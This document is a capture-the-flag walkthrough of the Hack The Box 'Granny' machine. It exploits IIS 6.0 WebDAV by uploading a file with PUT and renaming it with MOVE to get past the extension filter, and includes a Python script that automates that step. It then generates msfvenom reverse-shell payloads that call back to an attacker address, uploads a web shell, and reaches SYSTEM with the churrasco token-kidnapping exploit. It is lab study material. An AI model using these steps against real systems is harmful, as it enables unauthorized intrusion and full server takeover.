This is a walkthrough of the Granny box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans:
./nmapAutomator.sh 10.10.10.15 All
- All = runs all the scans consecutively
- Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.
Here are the results we get:
Things to note:
- Only port 80 was open, running Microsoft IIS httpd 6.0
- WebDAV is enabled
- Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites over HTTP
- The HTTP methods PUT, MOVE and DELETE are allowed (which means we can add, rename and remove files on this web server)
2. Enumeration
Navigate to the web server in a browser:
Gobuster found some directories during the scan, but there is nothing in there.
We can test the HTTP methods that the scan said were allowed. This is a Microsoft IIS web server, so it executes .asp and .aspx files. We can test whether these file types can be uploaded with the davtest tool that ships with Kali:
davtest --url http://10.10.10.15
According to the results, only html and txt files execute (that is, are served back) once uploaded, while files such as cfm, php, pl and jsp can be uploaded but do not execute, and script types like aspx are refused on PUT. Only being able to execute html and txt isn't a problem, though, because the MOVE method is allowed (and MOVE not only moves a file, it renames it). IIS only filters the extension on PUT, not on the Destination of a MOVE, so we should be able to PUT a .txt file and then MOVE it to an .aspx name. Let's do some testing:
First, create a file called test3.txt that contains the text “sup”
echo sup > test3.txt
Second, put the file onto the web server
curl -X PUT http://10.10.10.15/received.txt -d @test3.txt
- -d @test3.txt = says that the data for the PUT request should be the contents of the test3.txt file. Note that -d strips newlines from the file, which is fine for this one-line test; use --data-binary for anything where the bytes must arrive unchanged.
- I named the file that will be saved to the web server "received.txt"
Third, curl the file to see if it contains “sup” (you can see it at the beginning of the fourth line)
curl http://10.10.10.15/received.txt
If you try to do the same PUT test with a file named received.aspx instead of .txt, you will see that it fails to PUT (just like davtest said).
Now use MOVE to rename the test .txt file to an .aspx
curl -X MOVE --header 'Destination: http://10.10.10.15/received.aspx' 'http://10.10.10.15/received.txt'
- this will rename received.txt to received.aspx
curl http://10.10.10.15/received.aspx
- this should spit out the contents of the file (which is still “sup”). Ignore my first test. You can see after the second test, that “sup” is there, at the beginning of the 4th line)
This test lets us know that MOVE works successfully and we can use it going forward in our attack.
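The PUT-then-MOVE sequence above is the same one the foothold methods below rely on, so here it is automated end to end, as an added example that is not part of the original walkthrough. Because it has to run offline, a small stub WebDAV-style server is embedded that mimics the behaviour observed on the box (PUT of .asp/.aspx refused, PUT of .txt accepted, MOVE honoured for any destination name, GET serves the file back). The stub, the loopback host/port and the file names stage.txt and shell.aspx are assumptions for the demo, not values taken from the box; pointing the client functions at a real WebDAV host instead of the stub is the only change needed to use them for real.

```python
# Added example: automate PUT -> MOVE extension-filter bypass and verify it.
# The stub server below is an assumption that mimics the IIS 6.0 WebDAV
# behaviour described in the walkthrough; it is not the target.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

BLOCKED_PUT_EXT = (".asp", ".aspx")   # extensions the stub refuses on PUT
FILES = {}                            # in-memory "webroot": path -> bytes


class StubDavHandler(BaseHTTPRequestHandler):
    """Minimal PUT/MOVE/GET handler mimicking the misconfigured WebDAV server."""

    def log_message(self, *_):        # keep output quiet
        pass

    def do_PUT(self):
        if self.path.lower().endswith(BLOCKED_PUT_EXT):
            self.send_response(403)   # script extensions are refused on PUT
            self.end_headers()
            return
        length = int(self.headers.get("Content-Length", 0))
        FILES[self.path] = self.rfile.read(length)
        self.send_response(201)
        self.end_headers()

    def do_MOVE(self):
        # MOVE only checks that the source exists; the destination extension
        # is never filtered. This is the gap the walkthrough abuses.
        dest = urlparse(self.headers.get("Destination", "")).path
        if self.path not in FILES or not dest:
            self.send_response(404)
            self.end_headers()
            return
        FILES[dest] = FILES.pop(self.path)
        self.send_response(201)
        self.end_headers()

    def do_GET(self):
        body = FILES.get(self.path)
        if body is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_stub_server():
    """Start the stub on an ephemeral loopback port; returns (host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), StubDavHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address


def put_file(host, port, remote_name, data):
    """PUT raw bytes (equivalent of curl --data-binary); returns HTTP status."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("PUT", "/" + remote_name, body=data)
    status = conn.getresponse().status
    conn.close()
    return status


def move_file(host, port, src_name, dst_name):
    """Rename src to dst with a WebDAV MOVE; returns HTTP status."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    dest = f"http://{host}:{port}/{dst_name}"
    conn.request("MOVE", "/" + src_name, headers={"Destination": dest})
    status = conn.getresponse().status
    conn.close()
    return status


def fetch(host, port, remote_name):
    """GET a file back; returns (status, body bytes)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", "/" + remote_name)
    resp = conn.getresponse()
    result = (resp.status, resp.read())
    conn.close()
    return result


def upload_via_move(host, port, payload, final_name, staging_name="stage.txt"):
    """Try a direct PUT, then stage under .txt and MOVE to final_name.

    Returns each step's status plus whether the final file is served intact.
    """
    direct = put_file(host, port, final_name, payload)      # expected to fail
    staged = put_file(host, port, staging_name, payload)
    moved = move_file(host, port, staging_name, final_name)
    status, body = fetch(host, port, final_name)
    return {"direct_put": direct, "staged_put": staged, "move": moved,
            "final_get": status, "intact": body == payload}


if __name__ == "__main__":
    h, p = start_stub_server()
    # Constructed stand-in payload; a real run would send cmdasp.aspx bytes.
    print(upload_via_move(h, p, b'<%@ Page Language="C#" %>\r\nsup\r\n', "shell.aspx"))
```

The "intact" check matters because a payload that arrives with its line endings stripped (which is what curl -d does to a file) may not parse as ASPX; the client here sends the bytes unchanged, like --data-binary.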
3. Initial foothold
(METHOD 1)
1. Generate an aspx shell using msfvenom
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.2 LPORT=4444 -o shell.aspx
2. Then change the file from .aspx to .txt so you can upload it to the webserver
mv shell.aspx shell.txt
3. Then upload (PUT) the file onto the server
curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt
4. Then rename (MOVE) the file extension from .txt to .aspx
curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'
(METHOD 2)
1. Use the built-in Kali aspx web shell and copy it to your current working directory so you can use it
cp /usr/share/webshells/aspx/cmdasp.aspx .
- the “.” copies it to your present working directory
2. PUT the file (giving it a .txt extension) onto the webserver
curl -X PUT http://10.10.10.15/shell.txt --data-binary @cmdasp.aspx
- --data-binary @cmdasp.aspx = says that the data for the PUT request should be the contents of the cmdasp.aspx file, sent byte for byte. Plain -d would strip the newlines from the file, which can break the ASPX source.
3. Rename (MOVE) the .txt back to .aspx
curl -X MOVE -H 'Destination:http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.txt
By following method 1 or 2 above (either using msfvenom to generate a reverse shell, or using Kali's built-in web shell), you should now have the .aspx file uploaded to the web server. Before executing it, open up a new terminal window and start a netcat listener:
nc -nlvp 4444
Then go to the web browser and type in 10.10.10.15/shell.aspx to execute it (with the cmdasp.aspx web shell, you get a command box in the browser instead, and would run a reverse shell command from there). You should then see a shell come back to our machine through the listener. Run "whoami" and we can see that we are NOT SYSTEM yet.
4. Privilege Escalation
Run whoami and whoami /priv to see what user we're running as, and what privileges the token has enabled. We see we're running as NT AUTHORITY\NETWORK SERVICE and have the critical SeImpersonatePrivilege privilege enabled (which means we can impersonate a client after authentication).
We also know that the victim box is running Windows Server 2003, and there is a well-known token-kidnapping exploit that abuses SeImpersonatePrivilege on Server 2003 called churrasco. Let's download it:
git clone https://github.com/Re4son/Churrasco.git
or since the file we need is churrasco.exe we can just do:
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
The goal now is to get this file over to the victim. Since we need a location where NETWORK SERVICE can both write and execute the file once it is on the server, create a temp directory on the victim box:
cd C:\
mkdir temp
cd temp
Now back on your attack box, open a new terminal window and start up a file server so we can share our churrasco.exe with the victim box in the temp directory we created.
python /usr/share/doc/python3-impacket/examples/smbserver.py grannytemp /home/churr0s/Documents/HTB/granny/Churrasco/
- this runs the impacket smbserver script from its location (on current Kali it is also on the PATH as impacket-smbserver)
- grannytemp is the name of the SMB share I'm creating
- I am going to share all the contents of the ../granny/Churrasco/ directory on my box (Churrasco is what was cloned from GitHub and that directory contains the churrasco.exe file I want to copy to and execute on the victim box)
Now back on the victim box copy the churrasco.exe that is available to you now in the temporary shared directory I’ve set up with my file server:
copy \\10.10.14.2\grannytemp\churrasco.exe
- you will see the file server in the screenshot above starts showing activity
Now that the file is copied over, let’s execute it:
churrasco.exe
After executing, we run another "whoami" and see we are now NT AUTHORITY\SYSTEM (the Windows equivalent of root). However, after running one command to try to navigate back to the user directory, the shell dropped back to NETWORK SERVICE instead of NT AUTHORITY\SYSTEM. To get around this, we can make another msfvenom payload (this time as an .exe), send it to the victim box, and have churrasco run the msfvenom payload as SYSTEM so the reverse shell itself comes back as SYSTEM.
1. Create the new msfvenom payload:
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.2 lport=5555 -f exe -o revshell.exe
2. Open a new terminal window on your attack box and start a new listener over port 5555 to match your payload you just created
nc -nlvp 5555
3. Copy the payload over to our temp directory on the victim box using the same method we just used a minute ago. Make sure your file server is sharing whatever directory revshell.exe is in on your side.
4. The file is now copied over so let’s run our exploit again:
churrasco.exe -d "C:\temp\revshell.exe"
- the quoted string is the command churrasco runs as SYSTEM; give the full path of the payload. -d is churrasco's debug flag, which prints progress messages while it runs (it does not specify a directory)
If successful, you should now have a reverse shell as NT AUTHORITY\SYSTEM on the port 5555 listener!
Now grab the flags: